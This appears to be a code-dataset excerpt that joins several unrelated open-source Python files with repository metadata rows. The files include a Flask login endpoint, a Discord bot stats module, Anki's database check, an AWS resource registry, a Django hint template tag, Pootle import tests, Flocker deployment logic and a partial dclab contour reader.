url_prefix='/api/v<string:version>')
@blueprint.route('/login', methods=['POST'])
@csrf_protect.exempt
def login(version):
"""Login.
login to retrieve token.
"""
if version == '1':
return _login_first_version()
return jsonify({'code': 1, 'msg': 'Invalid version'})
def _login_first_version():
username = request.form.get('username')
password = request.form.get('password')
if username is None or password is None:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
username = username.strip().lower()
obj = User.query.filter(User.username == username).first()
if obj is None:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
flag = obj.check_password(password)
if not flag:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
if not obj.active:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
return jsonify({'code': 0, 'token': obj.get_auth_token()})
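# Illustrative client-side sketch (not part of the original module): how the
# /api/v1/login endpoint above could be exercised with the third-party
# ``requests`` library. Host, username and password are hypothetical
# placeholders; the response codes mirror the handler above (0 = success with
# token, 1 = unsupported version, 2 = invalid parameters/credentials).
#
#     import requests
#     resp = requests.post('http://localhost:5000/api/v1/login',
#                          data={'username': 'alice', 'password': 'secret'})
#     payload = resp.json()
#     if payload['code'] == 0:
#         token = payload['token']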
|
bsd-3-clause
| 8,983,722,349,411,378,000 | 23.98 | 63 | 0.610088 | false |
Yorimor/zurok_bot
|
yorimor/bot_stats.py
|
1
|
1516
|
import json
import os
stats_json_file = os.getcwd() + "/stats/command_stats.json"
def get_stats_file():
try:
with open(stats_json_file, "r", encoding="utf-8", errors="replace") as f:
json_file = json.load(f)
except FileNotFoundError:
json_file = {"global": {}, "servers": {}, "users": {}}
return json_file
def set_stats_file(json_file):
with open(stats_json_file, "w", encoding="utf-8", errors="replace") as f:
json.dump(json_file, f, sort_keys=True, indent=4)
def add_cmd_stat(cmd: str, user_id, server_id):
stats_json = get_stats_file()
user_id = str(user_id)
server_id = str(server_id)
    # Check whether an entry for this server exists; create it if not
if server_id not in stats_json["servers"]:
stats_json["servers"][server_id] = {}
    # Check whether an entry for this user exists; create it if not
if user_id not in stats_json["users"]:
stats_json["users"][user_id] = {}
# add cmd to global
if cmd not in stats_json["global"]:
stats_json["global"][cmd] = 1
else:
stats_json["global"][cmd] += 1
# add cmd to server stats
if cmd not in stats_json["servers"][server_id]:
stats_json["servers"][server_id][cmd] = 1
else:
stats_json["servers"][server_id][cmd] += 1
# add cmd to user stats
if cmd not in stats_json["users"][user_id]:
stats_json["users"][user_id][cmd] = 1
else:
stats_json["users"][user_id][cmd] += 1
set_stats_file(stats_json)
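# Illustrative usage sketch (not part of the original module); the command name
# and IDs are hypothetical placeholders. Guarded so it only runs when the file
# is executed directly, not on import.
if __name__ == "__main__":
    # Record one use of the "roll" command by user 42 on server 1001 ...
    add_cmd_stat("roll", user_id=42, server_id=1001)
    # ... then read the aggregated counters back from the JSON stats file.
    stats = get_stats_file()
    print(stats["global"].get("roll", 0))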
|
mit
| 4,984,897,427,109,594,000 | 27.074074 | 81 | 0.594327 | false |
simgunz/anki
|
qt/aqt/dbcheck.py
|
1
|
1471
|
# Copyright: Ankitects Pty Ltd and contributors
# License: GNU AGPL, version 3 or later; http://www.gnu.org/licenses/agpl.html
from __future__ import annotations
from concurrent.futures import Future
import aqt
from aqt.qt import *
from aqt.utils import showText, tooltip
def on_progress(mw: aqt.main.AnkiQt) -> None:
progress = mw.col.latest_progress()
if not progress.HasField("database_check"):
return
dbprogress = progress.database_check
mw.progress.update(
process=False,
label=dbprogress.stage,
value=dbprogress.stage_current,
max=dbprogress.stage_total,
)
def check_db(mw: aqt.AnkiQt) -> None:
def on_timer() -> None:
on_progress(mw)
timer = QTimer(mw)
qconnect(timer.timeout, on_timer)
timer.start(100)
def on_future_done(fut: Future) -> None:
timer.stop()
ret, ok = fut.result()
if not ok:
showText(ret)
else:
tooltip(ret)
# if an error has directed the user to check the database,
# silently clean up any broken reset hooks which distract from
# the underlying issue
n = 0
while n < 10:
try:
mw.reset()
break
except Exception as e:
print("swallowed exception in reset hook:", e)
n += 1
continue
mw.taskman.with_progress(mw.col.fixIntegrity, on_future_done)
|
agpl-3.0
| 822,746,869,428,643,500 | 25.267857 | 78 | 0.598912 | false |
scopely-devops/skew
|
skew/resources/__init__.py
|
1
|
4564
|
# Copyright (c) 2014 Scopely, Inc.
# Copyright (c) 2015 Mitch Garnaat
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import importlib
# Maps resources names as they appear in ARN's to the path name
# of the Python class representing that resource.
ResourceTypes = {
'aws.acm.certificate': 'aws.acm.Certificate',
'aws.apigateway.restapis': 'aws.apigateway.RestAPI',
'aws.autoscaling.autoScalingGroup': 'aws.autoscaling.AutoScalingGroup',
'aws.autoscaling.launchConfigurationName': 'aws.autoscaling.LaunchConfiguration',
'aws.cloudfront.distribution': 'aws.cloudfront.Distribution',
'aws.cloudformation.stack': 'aws.cloudformation.Stack',
'aws.cloudwatch.alarm': 'aws.cloudwatch.Alarm',
'aws.logs.log-group': 'aws.cloudwatch.LogGroup',
'aws.cloudtrail.trail': 'aws.cloudtrail.CloudTrail',
'aws.dynamodb.table': 'aws.dynamodb.Table',
'aws.ec2.address': 'aws.ec2.Address',
'aws.ec2.customer-gateway': 'aws.ec2.CustomerGateway',
'aws.ec2.key-pair': 'aws.ec2.KeyPair',
'aws.ec2.image': 'aws.ec2.Image',
'aws.ec2.instance': 'aws.ec2.Instance',
'aws.ec2.natgateway': 'aws.ec2.NatGateway',
'aws.ec2.network-acl': 'aws.ec2.NetworkAcl',
'aws.ec2.route-table': 'aws.ec2.RouteTable',
'aws.ec2.internet-gateway': 'aws.ec2.InternetGateway',
'aws.ec2.security-group': 'aws.ec2.SecurityGroup',
'aws.ec2.snapshot': 'aws.ec2.Snapshot',
'aws.ec2.volume': 'aws.ec2.Volume',
'aws.ec2.vpc': 'aws.ec2.Vpc',
'aws.ec2.flow-log': 'aws.ec2.FlowLog',
'aws.ec2.vpc-peering-connection': 'aws.ec2.VpcPeeringConnection',
'aws.ec2.subnet': 'aws.ec2.Subnet',
'aws.ec2.launch-template': 'aws.ec2.LaunchTemplate',
'aws.elasticache.cluster': 'aws.elasticache.Cluster',
'aws.elasticache.subnet-group': 'aws.elasticache.SubnetGroup',
'aws.elasticache.snapshot': 'aws.elasticache.Snapshot',
'aws.elasticbeanstalk.application': 'aws.elasticbeanstalk.Application',
'aws.elasticbeanstalk.environment': 'aws.elasticbeanstalk.Environment',
'aws.elb.loadbalancer': 'aws.elb.LoadBalancer',
'aws.es.domain': 'aws.es.ElasticsearchDomain',
'aws.firehose.deliverystream': 'aws.firehose.DeliveryStream',
'aws.iam.group': 'aws.iam.Group',
'aws.iam.instance-profile': 'aws.iam.InstanceProfile',
'aws.iam.role': 'aws.iam.Role',
'aws.iam.policy': 'aws.iam.Policy',
'aws.iam.user': 'aws.iam.User',
'aws.iam.server-certificate': 'aws.iam.ServerCertificate',
'aws.kinesis.stream': 'aws.kinesis.Stream',
'aws.lambda.function': 'aws.lambda.Function',
'aws.rds.db': 'aws.rds.DBInstance',
'aws.rds.secgrp': 'aws.rds.DBSecurityGroup',
'aws.redshift.cluster': 'aws.redshift.Cluster',
'aws.route53.hostedzone': 'aws.route53.HostedZone',
'aws.route53.healthcheck': 'aws.route53.HealthCheck',
'aws.s3.bucket': 'aws.s3.Bucket',
'aws.sqs.queue': 'aws.sqs.Queue',
'aws.sns.subscription': 'aws.sns.Subscription',
'aws.sns.topic': 'aws.sns.Topic'
}
def all_providers():
providers = set()
for resource_type in ResourceTypes:
providers.add(resource_type.split('.')[0])
return list(providers)
def all_services(provider_name):
services = set()
for resource_type in ResourceTypes:
t = resource_type.split('.')
if t[0] == provider_name:
services.add(t[1])
return list(services)
def all_types(provider_name, service_name):
types = set()
for resource_type in ResourceTypes:
t = resource_type.split('.')
if t[0] == provider_name and t[1] == service_name:
types.add(t[2])
return list(types)
def find_resource_class(resource_path):
"""
dynamically load a class from a string
"""
class_path = ResourceTypes[resource_path]
# First prepend our __name__ to the resource string passed in.
full_path = '.'.join([__name__, class_path])
class_data = full_path.split(".")
module_path = ".".join(class_data[:-1])
class_str = class_data[-1]
module = importlib.import_module(module_path)
# Finally, we retrieve the Class
return getattr(module, class_str)
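# Illustrative usage sketch (not part of the original module), showing the
# intended call pattern for the helpers above; the example resource path comes
# from the ResourceTypes registry:
#
#     >>> 'ec2' in all_services('aws')
#     True
#     >>> cls = find_resource_class('aws.ec2.instance')
#     >>> cls.__name__
#     'Instance'
#
# find_resource_class() imports skew.resources.aws.ec2 on demand, so the
# installed skew package must provide that module for the call to succeed.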
|
apache-2.0
| 8,883,381,273,209,655,000 | 39.75 | 85 | 0.681858 | false |
littleweaver/django-zenaida
|
zenaida/contrib/hints/templatetags/hints.py
|
1
|
4054
|
from django import template
from django.core.urlresolvers import reverse, NoReverseMatch
from zenaida.contrib import hints
from zenaida.contrib.hints.models import Dismissed
from zenaida.contrib.hints.forms import DismissHintForm
register = template.Library()
@register.tag("hint")
def hint(parser, token):
"""
Usage::
{% hint user key1 [key2 [...]] [immediate] %}
<div class="alert alert-info">
<p>Here's a little hint.</p>
<form action="{{ hint.dismiss_action }}" method="post">
{% csrf_token %}
{{ hint.dismiss_form }}
<button>Dismiss this hint!</button>
</form>
</div>
{% dismissed %}
<p>I see you've been here before!</p>
{% endhint %}
The hint tag accepts a user object, any number of keys, and an optional
``immediate`` keyword. If the ``immediate`` keyword is provided, the hint
is displayed once, immediately marked for dismissal, and will not be
displayed again.
The hint tag also sets some variables in context::
========================== =============================================
Variable Description
========================== =============================================
``hint.dismiss_form`` The form to be used for dismissing the hint.
``hint.dismiss_action`` The URL to which the `dismiss_form` should
be submitted.
``hint.parent_hint`` For nested hints (why are you nesting
hints?!), this is the hint above the
current one
========================== =============================================
"""
bits = token.split_contents()[1:]
if bits[-1] == "immediate":
immediate = True
bits = bits[:-1]
else:
immediate = False
values = [parser.compile_filter(bit) for bit in bits]
nodelist = parser.parse(("dismissed", "endhint",))
token = parser.next_token()
if token.contents == "dismissed":
nodelist_dismissed = parser.parse(("endhint",))
parser.delete_first_token()
else:
nodelist_dismissed = None
return HintNode(values, nodelist, nodelist_dismissed, immediate)
class HintNode(template.Node):
def __init__(self, variables, nodelist, nodelist_dismissed=None, immediate=False):
self.nodelist = nodelist
self.nodelist_dismissed = nodelist_dismissed
self.immediate = immediate
self.vars = variables
def render(self, context):
if 'hint' in context:
parent_hint = context['hint']
else:
parent_hint = {}
with context.push():
user = self.vars[0].resolve(context)
keys = [unicode(x.resolve(context)) for x in self.vars[1:]]
keystring = "".join(keys)
try:
# Add extra stuff to context:
context['hint'] = {
'dismiss_form': DismissHintForm(initial={'key': keystring}),
'dismiss_action': reverse('zenaida.contrib.hints.views.dismiss'),
'parent_hint': parent_hint
}
except NoReverseMatch as e:
message = "{}. {}.".format(str(e), "Ensure that url(r'^hints/', include('zenaida.contrib.hints.urls')) is in your urlconf")
raise NoReverseMatch(message)
dismissed = Dismissed.objects.filter(key=keystring, user=user).exists()
if not dismissed:
output = self.nodelist.render(context)
# If immediate is set, dismiss the hint
if self.immediate:
hints.dismiss(user, keys)
elif self.nodelist_dismissed is not None:
# If there is a dismissed block, render it:
output = self.nodelist_dismissed.render(context)
else:
output = ""
return output
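# Illustrative urlconf sketch (not part of the original module): the reverse()
# call in HintNode.render() assumes the hints URLs are included in the project
# urlconf, as the NoReverseMatch message above spells out. The 'hints/' prefix
# is a placeholder:
#
#     from django.conf.urls import include, url
#
#     urlpatterns = [
#         url(r'^hints/', include('zenaida.contrib.hints.urls')),
#     ]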
|
bsd-3-clause
| 8,631,350,533,585,729,000 | 35.854545 | 139 | 0.532067 | false |
Yelp/pootle
|
tests/import_export/import.py
|
1
|
1745
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import os
import pytest
from django.core.files.uploadedfile import SimpleUploadedFile
from import_export.utils import import_file
from import_export.exceptions import UnsupportedFiletypeError
from pootle_store.models import NEW, PARSED, Store
TEST_PO_DIR = "tests/data/po/tutorial/en"
IMPORT_SUCCESS = "headers_correct.po"
IMPORT_UNSUPP_FILE = "tutorial.ts"
def _import_file(file_name, file_dir=TEST_PO_DIR,
content_type="text/x-gettext-translation"):
with open(os.path.join(file_dir, file_name), "r") as f:
import_file(SimpleUploadedFile(file_name,
f.read(),
content_type))
@pytest.mark.django_db
def test_import_success(en_tutorial_po_no_file):
assert en_tutorial_po_no_file.state == NEW
_import_file(IMPORT_SUCCESS)
store = Store.objects.get(pk=en_tutorial_po_no_file.pk)
assert store.state == PARSED
@pytest.mark.django_db
def test_import_failure(file_import_failure, en_tutorial_po):
filename, exception = file_import_failure
with pytest.raises(exception):
_import_file(filename)
@pytest.mark.django_db
def test_import_unsupported(en_tutorial_ts, ts_directory):
with pytest.raises(UnsupportedFiletypeError):
_import_file(IMPORT_UNSUPP_FILE,
file_dir=os.path.join(ts_directory, "tutorial/en"),
content_type="text/vnd.trolltech.linguist")
|
gpl-3.0
| -3,093,608,413,008,632,300 | 31.924528 | 77 | 0.684241 | false |
beni55/flocker
|
flocker/node/_deploy.py
|
1
|
18591
|
# Copyright Hybrid Logic Ltd. See LICENSE file for details.
# -*- test-case-name: flocker.node.test.test_deploy -*-
"""
Deploy applications on nodes.
"""
from zope.interface import Interface, implementer
from characteristic import attributes
from twisted.internet.defer import gatherResults, fail, DeferredList, succeed
from twisted.python.filepath import FilePath
from .gear import GearClient, PortMap, GearEnvironment
from ._model import (
Application, VolumeChanges, AttachedVolume, VolumeHandoff,
)
from ..route import make_host_network, Proxy
from ..volume._ipc import RemoteVolumeManager
from ..common._ipc import ProcessNode
# Path to SSH private key available on nodes and used to communicate
# across nodes.
# XXX duplicate of same information in flocker.cli:
# https://github.com/ClusterHQ/flocker/issues/390
SSH_PRIVATE_KEY_PATH = FilePath(b"/etc/flocker/id_rsa_flocker")
@attributes(["running", "not_running"])
class NodeState(object):
"""
The current state of a node.
:ivar running: A ``list`` of ``Application`` instances on this node
that are currently running or starting up.
:ivar not_running: A ``list`` of ``Application`` instances on this
node that are currently shutting down or stopped.
"""
class IStateChange(Interface):
"""
An operation that changes the state of the local node.
"""
def run(deployer):
"""
Run the change.
:param Deployer deployer: The ``Deployer`` to use.
:return: ``Deferred`` firing when the change is done.
"""
def __eq__(other):
"""
Return whether this change is equivalent to another.
"""
def __ne__(other):
"""
Return whether this change is not equivalent to another.
"""
@implementer(IStateChange)
@attributes(["changes"])
class Sequentially(object):
"""
Run a series of changes in sequence, one after the other.
Failures in earlier changes stop later changes.
"""
def run(self, deployer):
d = succeed(None)
for change in self.changes:
d.addCallback(lambda _, change=change: change.run(deployer))
return d
@implementer(IStateChange)
@attributes(["changes"])
class InParallel(object):
"""
Run a series of changes in parallel.
Failures in one change do not prevent other changes from continuing.
"""
def run(self, deployer):
return gatherResults((change.run(deployer) for change in self.changes),
consumeErrors=True)
@implementer(IStateChange)
@attributes(["application"])
class StartApplication(object):
"""
Launch the supplied application as a gear unit.
:ivar Application application: The ``Application`` to create and
start.
"""
def run(self, deployer):
application = self.application
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
d = volume.expose_to_docker(application.volume.mountpoint)
else:
d = succeed(None)
if application.ports is not None:
port_maps = map(lambda p: PortMap(internal_port=p.internal_port,
external_port=p.external_port),
application.ports)
else:
port_maps = []
if application.environment is not None:
environment = GearEnvironment(
id=application.name,
variables=application.environment)
else:
environment = None
d.addCallback(lambda _: deployer.gear_client.add(
application.name,
application.image.full_name,
ports=port_maps,
environment=environment
))
return d
@implementer(IStateChange)
@attributes(["application"])
class StopApplication(object):
"""
Stop and disable the given application.
:ivar Application application: The ``Application`` to stop.
"""
def run(self, deployer):
application = self.application
unit_name = application.name
result = deployer.gear_client.remove(unit_name)
def unit_removed(_):
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
return volume.remove_from_docker()
result.addCallback(unit_removed)
return result
@implementer(IStateChange)
@attributes(["volume"])
class CreateVolume(object):
"""
Create a new locally-owned volume.
:ivar AttachedVolume volume: Volume to create.
"""
def run(self, deployer):
return deployer.volume_service.create(self.volume.name)
@implementer(IStateChange)
@attributes(["volume"])
class WaitForVolume(object):
"""
Wait for a volume to exist and be owned locally.
:ivar AttachedVolume volume: Volume to wait for.
"""
def run(self, deployer):
return deployer.volume_service.wait_for_volume(self.volume.name)
@implementer(IStateChange)
@attributes(["volume", "hostname"])
class HandoffVolume(object):
"""
A volume handoff that needs to be performed from this node to another
node.
See :cls:`flocker.volume.VolumeService.handoff` for more details.
:ivar AttachedVolume volume: The volume to hand off.
:ivar bytes hostname: The hostname of the node to which the volume is
meant to be handed off.
"""
def run(self, deployer):
service = deployer.volume_service
destination = ProcessNode.using_ssh(
self.hostname, 22, b"root",
SSH_PRIVATE_KEY_PATH)
return service.handoff(service.get(self.volume.name),
RemoteVolumeManager(destination))
@implementer(IStateChange)
@attributes(["ports"])
class SetProxies(object):
"""
Set the ports which will be forwarded to other nodes.
:ivar ports: A collection of ``Port`` objects.
"""
def run(self, deployer):
results = []
# XXX: Errors in these operations should be logged. See
# https://github.com/ClusterHQ/flocker/issues/296
# XXX: The proxy manipulation operations are blocking. Convert to a
# non-blocking API. See https://github.com/ClusterHQ/flocker/issues/320
for proxy in deployer.network.enumerate_proxies():
try:
deployer.network.delete_proxy(proxy)
except:
results.append(fail())
for proxy in self.ports:
try:
deployer.network.create_proxy_to(proxy.ip, proxy.port)
except:
results.append(fail())
return DeferredList(results, fireOnOneErrback=True, consumeErrors=True)
class Deployer(object):
"""
Start and stop applications.
:ivar VolumeService volume_service: The volume manager for this node.
:ivar IGearClient gear_client: The gear client API to use in
deployment operations. Default ``GearClient``.
:ivar INetwork network: The network routing API to use in
deployment operations. Default is iptables-based implementation.
"""
def __init__(self, volume_service, gear_client=None, network=None):
if gear_client is None:
gear_client = GearClient(hostname=u'127.0.0.1')
self.gear_client = gear_client
if network is None:
network = make_host_network()
self.network = network
self.volume_service = volume_service
def discover_node_configuration(self):
"""
List all the ``Application``\ s running on this node.
:returns: A ``Deferred`` which fires with a ``NodeState``
instance.
"""
volumes = self.volume_service.enumerate()
volumes.addCallback(lambda volumes: set(
volume.name for volume in volumes
if volume.uuid == self.volume_service.uuid))
d = gatherResults([self.gear_client.list(), volumes])
def applications_from_units(result):
units, available_volumes = result
running = []
not_running = []
for unit in units:
# XXX: The container_image will be available on the
# Unit when
# https://github.com/ClusterHQ/flocker/issues/207 is
# resolved.
if unit.name in available_volumes:
# XXX Mountpoint is not available, see
# https://github.com/ClusterHQ/flocker/issues/289
volume = AttachedVolume(name=unit.name, mountpoint=None)
else:
volume = None
application = Application(name=unit.name,
volume=volume)
if unit.activation_state in (u"active", u"activating"):
running.append(application)
else:
not_running.append(application)
return NodeState(running=running, not_running=not_running)
d.addCallback(applications_from_units)
return d
def calculate_necessary_state_changes(self, desired_state,
current_cluster_state, hostname):
"""
Work out which changes need to happen to the local state to match
the given desired state.
Currently this involves the following phases:
1. Change proxies to point to new addresses (should really be
last, see https://github.com/ClusterHQ/flocker/issues/380)
2. Stop all relevant containers.
3. Handoff volumes.
4. Wait for volumes.
5. Create volumes.
6. Start and restart any relevant containers.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes. While technically this also includes the current
node's state, this information may be out of date so we check
again to ensure we have absolute latest information.
:param unicode hostname: The hostname of the node that this is running
on.
:return: A ``Deferred`` which fires with a ``IStateChange``
provider.
"""
phases = []
desired_proxies = set()
desired_node_applications = []
for node in desired_state.nodes:
if node.hostname == hostname:
desired_node_applications = node.applications
else:
for application in node.applications:
for port in application.ports:
# XXX: also need to do DNS resolution. See
# https://github.com/ClusterHQ/flocker/issues/322
desired_proxies.add(Proxy(ip=node.hostname,
port=port.external_port))
if desired_proxies != set(self.network.enumerate_proxies()):
phases.append(SetProxies(ports=desired_proxies))
d = self.discover_node_configuration()
def find_differences(current_node_state):
current_node_applications = current_node_state.running
all_applications = (current_node_state.running +
current_node_state.not_running)
# Compare the applications being changed by name only. Other
# configuration changes aren't important at this point.
current_state = {app.name for app in current_node_applications}
desired_local_state = {app.name for app in
desired_node_applications}
not_running = {app.name for app in current_node_state.not_running}
# Don't start applications that exist on this node but aren't
# running; instead they should be restarted:
start_names = desired_local_state.difference(
current_state | not_running)
stop_names = {app.name for app in all_applications}.difference(
desired_local_state)
start_containers = [
StartApplication(application=app)
for app in desired_node_applications
if app.name in start_names
]
stop_containers = [
StopApplication(application=app) for app in all_applications
if app.name in stop_names
]
restart_containers = [
Sequentially(changes=[StopApplication(application=app),
StartApplication(application=app)])
for app in desired_node_applications
if app.name in not_running
]
# Find any applications with volumes that are moving to or from
# this node - or that are being newly created by this new
# configuration.
volumes = find_volume_changes(hostname, current_cluster_state,
desired_state)
if stop_containers:
phases.append(InParallel(changes=stop_containers))
if volumes.going:
phases.append(InParallel(changes=[
HandoffVolume(volume=handoff.volume,
hostname=handoff.hostname)
for handoff in volumes.going]))
if volumes.coming:
phases.append(InParallel(changes=[
WaitForVolume(volume=volume)
for volume in volumes.coming]))
if volumes.creating:
phases.append(InParallel(changes=[
CreateVolume(volume=volume)
for volume in volumes.creating]))
start_restart = start_containers + restart_containers
if start_restart:
phases.append(InParallel(changes=start_restart))
d.addCallback(find_differences)
d.addCallback(lambda _: Sequentially(changes=phases))
return d
def change_node_state(self, desired_state,
current_cluster_state,
hostname):
"""
Change the local state to match the given desired state.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes.
:param unicode hostname: The hostname of the node that this is running
on.
:return: ``Deferred`` that fires when the necessary changes are done.
"""
d = self.calculate_necessary_state_changes(
desired_state=desired_state,
current_cluster_state=current_cluster_state,
hostname=hostname)
d.addCallback(lambda change: change.run(self))
return d
def find_volume_changes(hostname, current_state, desired_state):
"""
Find what actions need to be taken to deal with changes in volume
location between current state and desired state of the cluster.
XXX The logic here assumes the mountpoints have not changed,
and will act unexpectedly if that is the case. See
https://github.com/ClusterHQ/flocker/issues/351 for more details.
XXX The logic here assumes volumes are never added or removed to
existing applications, merely moved across nodes. As a result test
coverage for those situations is not implemented. See
https://github.com/ClusterHQ/flocker/issues/352 for more details.
XXX Comparison is done via volume name, rather than AttachedVolume
objects, until https://github.com/ClusterHQ/flocker/issues/289 is fixed.
:param unicode hostname: The name of the node for which to find changes.
:param Deployment current_state: The old state of the cluster on which the
changes are based.
:param Deployment desired_state: The new state of the cluster towards which
the changes are working.
"""
desired_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in desired_state.nodes}
current_volumes = {node.hostname: set(application.volume for application
in node.applications
if application.volume)
for node in current_state.nodes}
local_desired_volumes = desired_volumes.get(hostname, set())
local_desired_volume_names = set(volume.name for volume in
local_desired_volumes)
local_current_volume_names = set(volume.name for volume in
current_volumes.get(hostname, set()))
remote_current_volume_names = set()
for volume_hostname, current in current_volumes.items():
if volume_hostname != hostname:
remote_current_volume_names |= set(
volume.name for volume in current)
# Look at each application volume that is going to be running
# elsewhere and is currently running here, and add a VolumeHandoff for
# it to `going`.
going = set()
for volume_hostname, desired in desired_volumes.items():
if volume_hostname != hostname:
for volume in desired:
if volume.name in local_current_volume_names:
going.add(VolumeHandoff(volume=volume,
hostname=volume_hostname))
# Look at each application volume that is going to be started on this
# node. If it was running somewhere else, we want that Volume to be
# in `coming`.
coming_names = local_desired_volume_names.intersection(
remote_current_volume_names)
coming = set(volume for volume in local_desired_volumes
if volume.name in coming_names)
# For each application volume that is going to be started on this node
# that was not running anywhere previously, make sure that Volume is
# in `creating`.
creating_names = local_desired_volume_names.difference(
local_current_volume_names | remote_current_volume_names)
creating = set(volume for volume in local_desired_volumes
if volume.name in creating_names)
return VolumeChanges(going=going, coming=coming, creating=creating)
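# Illustrative composition sketch (not part of the original module): the
# IStateChange tree produced by Deployer.calculate_necessary_state_changes()
# nests InParallel phases inside a single Sequentially change. A hand-built
# equivalent for one hypothetical application object might look like this:
#
#     changes = Sequentially(changes=[
#         InParallel(changes=[StopApplication(application=app)]),
#         InParallel(changes=[WaitForVolume(volume=app.volume)]),
#         InParallel(changes=[StartApplication(application=app)]),
#     ])
#     d = changes.run(deployer)   # Deferred fires once every phase completes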
|
apache-2.0
| 2,322,558,771,706,020,000 | 36.709939 | 79 | 0.612232 | false |
ZellMechanik-Dresden/dclab
|
dclab/rtdc_dataset/fmt_tdms/event_contour.py
|
1
|
8965
|
"""Class for efficiently handling contour data"""
import sys
import warnings
import numpy as np
from ...features import inert_ratio
from .exc import ContourIndexingError
class ContourVerificationWarning(UserWarning):
pass
class ContourColumn(object):
def __init__(self, rtdc_dataset):
"""A wrapper for ContourData that takes into account event offsets
Event offsets appear when the first event that is recorded in the
tdms files does not have a corresponding contour in the contour
text file.
"""
fname = self.find_contour_file(rtdc_dataset)
if fname is None:
self.identifier = None
else:
if sys.version_info[0] == 2:
self.identifier = str(fname).decode("utf-8")
else:
self.identifier = str(fname)
if fname is not None:
self._contour_data = ContourData(fname)
self._initialized = False
else:
self._contour_data = []
# prevent `determine_offset` to be called
self._initialized = True
self.frame = rtdc_dataset["frame"]
# if they are set, these features are used for verifying the contour
self.pxfeat = {}
if "area_msd" in rtdc_dataset:
self.pxfeat["area_msd"] = rtdc_dataset["area_msd"]
if "pixel size" in rtdc_dataset.config["imaging"]:
px_size = rtdc_dataset.config["imaging"]["pixel size"]
for key in ["pos_x", "pos_y", "size_x", "size_y"]:
if key not in rtdc_dataset.features_innate:
# abort
self.pxfeat.clear()
break
self.pxfeat[key] = rtdc_dataset[key] / px_size
if "image" in rtdc_dataset:
self.shape = rtdc_dataset["image"].shape
else:
self.shape = None
self.event_offset = 0
def __getitem__(self, idx):
if not self._initialized:
self.determine_offset()
idnew = idx-self.event_offset
cdata = None
if idnew < 0:
# No contour data
cdata = np.zeros((2, 2), dtype=int)
else:
# Assign contour based on stored frame index
frame_ist = self.frame[idx]
# Do not only check the exact frame, but +/- 2 events around it
for idn in [idnew, idnew-1, idnew+1, idnew-2, idnew+2]:
# check frame
try:
frame_soll = self._contour_data.get_frame(idn)
except IndexError:
# reached end of file
continue
if np.allclose(frame_soll, frame_ist, rtol=0):
cdata = self._contour_data[idn]
break
            if cdata is None and self.shape and self.pxfeat:
# The frame is wrong, but the contour might be correct.
# We check that by verifying several features.
cdata2 = self._contour_data[idnew]
cont = np.zeros((self.shape[1], self.shape[0]))
cont[cdata2[:, 0], cdata2[:, 1]] = True
mm = inert_ratio.cont_moments_cv(cdata2)
if (np.allclose(self.pxfeat["size_x"][idx],
np.ptp(cdata2[:, 0]) + 1,
rtol=0, atol=1e-5)
and np.allclose(self.pxfeat["size_y"][idx],
np.ptp(cdata2[:, 1]) + 1,
rtol=0, atol=1e-5)
and np.allclose(mm["m00"],
self.pxfeat["area_msd"][idx],
rtol=0, atol=1e-5)
# atol=6 for positions, because the original positions
# are computed from the convex contour, which would be
# computed using cv2.convexHull(cdata2).
and np.allclose(self.pxfeat["pos_x"][idx],
mm["m10"]/mm["m00"],
rtol=0, atol=6)
and np.allclose(self.pxfeat["pos_y"][idx],
mm["m01"]/mm["m00"],
rtol=0, atol=6)):
cdata = cdata2
if cdata is None:
            # No idea what went wrong, but we make the best guess and
# issue a warning.
cdata = self._contour_data[idnew]
frame_c = self._contour_data.get_frame(idnew)
warnings.warn(
"Couldn't verify contour {} in {}".format(idx, self.identifier)
+ " (frame index {})!".format(frame_c),
ContourVerificationWarning
)
return cdata
def __len__(self):
length = len(self._contour_data)
if length:
if not self._initialized:
self.determine_offset()
length += self.event_offset
return length
def determine_offset(self):
"""Determines the offset of the contours w.r.t. other data columns
Notes
-----
- the "frame" column of `rtdc_dataset` is compared to
the first contour in the contour text file to determine an
offset by one event
- modifies the property `event_offset` and sets `_initialized`
to `True`
"""
# In case of regular RTDC, the first contour is
# missing. In case of fRTDC, it is there, so we
# might have an offset. We find out if the first
# contour frame is missing by comparing it to
# the "frame" column of the rtdc dataset.
fref = self._contour_data.get_frame(0)
f0 = self.frame[0]
f1 = self.frame[1]
# Use allclose to avoid float/integer comparison problems
if np.allclose(fref, f0, rtol=0):
self.event_offset = 0
elif np.allclose(fref, f1, rtol=0):
self.event_offset = 1
else:
msg = "Contour data has unknown offset (frame {})!".format(fref)
raise ContourIndexingError(msg)
self._initialized = True
@staticmethod
def find_contour_file(rtdc_dataset):
"""Tries to find a contour file that belongs to an RTDC dataset
Returns None if no contour file is found.
"""
cont_id = rtdc_dataset.path.stem
cands = [c.name for c in rtdc_dataset._fdir.glob("*_contours.txt")]
cands = sorted(cands)
# Search for perfect matches, e.g.
# - M1_0.240000ul_s.tdms
# - M1_0.240000ul_s_contours.txt
for c1 in cands:
if c1.startswith(cont_id):
cfile = rtdc_dataset._fdir / c1
break
else:
# Search for M* matches with most overlap, e.g.
# - M1_0.240000ul_s.tdms
# - M1_contours.txt
for c2 in cands:
if (c2.split("_")[0] == rtdc_dataset._mid):
# Do not confuse with M10_contours.txt
cfile = rtdc_dataset._fdir / c2
break
else:
cfile = None
return cfile
class ContourData(object):
def __init__(self, fname):
"""Access an MX_contour.txt as a dictionary
Initialize this class with a *_contour.txt file.
The individual contours can be accessed like a
list (enumerated from 0 on).
"""
self._initialized = False
self.filename = fname
def __getitem__(self, idx):
